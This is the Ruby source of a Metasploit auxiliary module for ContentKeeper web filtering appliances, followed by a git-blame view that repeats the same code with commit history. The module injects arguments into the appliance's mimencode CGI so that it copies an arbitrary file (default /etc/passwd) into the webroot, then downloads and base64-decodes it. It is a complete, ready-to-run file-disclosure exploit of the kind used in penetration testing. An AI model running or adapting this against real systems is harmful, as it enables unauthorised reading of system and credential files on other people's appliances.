metasploit-framework/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'        => 'ContentKeeper Web Appliance mimencode File Access',
      'Description' => %q{
        This module abuses the 'mimencode' binary present within
        ContentKeeper Web filtering appliances to retrieve arbitrary
        files outside of the webroot.
        },
      'References'   =>
        [
          [ 'OSVDB', '54551' ],
          [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
        ],
      'Author'      => [ 'patrick' ],
      'License'     => MSF_LICENSE)

    register_options(
      [
        OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
        OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),
      ], self.class)
  end

  def run_host(ip)
    begin
      tmpfile = Rex::Text.rand_text_alphanumeric(20) # Store the base64 encoded traveral data in a hard-to-brute filename, just in case.

      print_status("Attempting to connect to #{rhost}:#{rport}")
      res = send_request_raw(
        {
          'method'  => 'POST',
          'uri'     => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],
        }, 25)

      if (res and res.code == 500)

        print_status("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")

        file = send_request_raw(
          {
            'method'  => 'GET',
            'uri'     => '/' + tmpfile,
          }, 25)

        if (file and file.code == 200)
          print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")
        elsif (file and file.code)
          print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")
        end
      elsif (res and res.code)
        print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")
      end

    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
    rescue ::Timeout::Error, ::Errno::EPIPE

    end
  end
end
Added contentkeeper_fileaccess aux traversal module. git-svn-id: file:///home/svn/framework3/trunk@12288 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-10 15:27:17 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Added contentkeeper_fileaccess aux traversal module. git-svn-id: file:///home/svn/framework3/trunk@12288 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-10 15:27:17 +00:00			`##`

			`require 'msf/core'`

use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Auxiliary`
Added contentkeeper_fileaccess aux traversal module. git-svn-id: file:///home/svn/framework3/trunk@12288 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-10 15:27:17 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::HttpClient`
			`include Msf::Auxiliary::Scanner`
Added contentkeeper_fileaccess aux traversal module. git-svn-id: file:///home/svn/framework3/trunk@12288 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-10 15:27:17 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize`
			`super(`
			`'Name' => 'ContentKeeper Web Appliance mimencode File Access',`
			`'Description' => %q{`
			`This module abuses the 'mimencode' binary present within`
			`ContentKeeper Web filtering appliances to retrieve arbitrary`
			`files outside of the webroot.`
			`},`
			`'References' =>`
			`[`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`[ 'OSVDB', '54551' ],`
Retab modules 2013-08-30 21:28:54 +00:00			`[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],`
			`],`
			`'Author' => [ 'patrick' ],`
			`'License' => MSF_LICENSE)`
Added contentkeeper_fileaccess aux traversal module. git-svn-id: file:///home/svn/framework3/trunk@12288 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-10 15:27:17 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`register_options(`
			`[`
			`OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),`
			`OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),`
			`], self.class)`
			`end`
Added contentkeeper_fileaccess aux traversal module. git-svn-id: file:///home/svn/framework3/trunk@12288 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-10 15:27:17 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def run_host(ip)`
			`begin`
			`tmpfile = Rex::Text.rand_text_alphanumeric(20) # Store the base64 encoded traveral data in a hard-to-brute filename, just in case.`
Added contentkeeper_fileaccess aux traversal module. git-svn-id: file:///home/svn/framework3/trunk@12288 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-10 15:27:17 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Attempting to connect to #{rhost}:#{rport}")`
			`res = send_request_raw(`
			`{`
			`'method' => 'POST',`
			`'uri' => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE'],`
			`}, 25)`
Added contentkeeper_fileaccess aux traversal module. git-svn-id: file:///home/svn/framework3/trunk@12288 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-10 15:27:17 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if (res and res.code == 500)`
Added contentkeeper_fileaccess aux traversal module. git-svn-id: file:///home/svn/framework3/trunk@12288 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-10 15:27:17 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")`
msftidy on aux modules, see #5749 2011-11-20 02:12:07 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`file = send_request_raw(`
			`{`
			`'method' => 'GET',`
			`'uri' => '/' + tmpfile,`
			`}, 25)`
msftidy on aux modules, see #5749 2011-11-20 02:12:07 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`if (file and file.code == 200)`
			`print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")`
			`elsif (file and file.code)`
			`print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")`
			`end`
			`elsif (res and res.code)`
			`print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")`
			`end`
Added contentkeeper_fileaccess aux traversal module. git-svn-id: file:///home/svn/framework3/trunk@12288 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-10 15:27:17 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`
			`rescue ::Timeout::Error, ::Errno::EPIPE`
Added contentkeeper_fileaccess aux traversal module. git-svn-id: file:///home/svn/framework3/trunk@12288 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-10 15:27:17 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`end`
			`end`
Added contentkeeper_fileaccess aux traversal module. git-svn-id: file:///home/svn/framework3/trunk@12288 4d416f70-5f16-0410-b530-b9f4589650da 2011-04-10 15:27:17 +00:00			`end`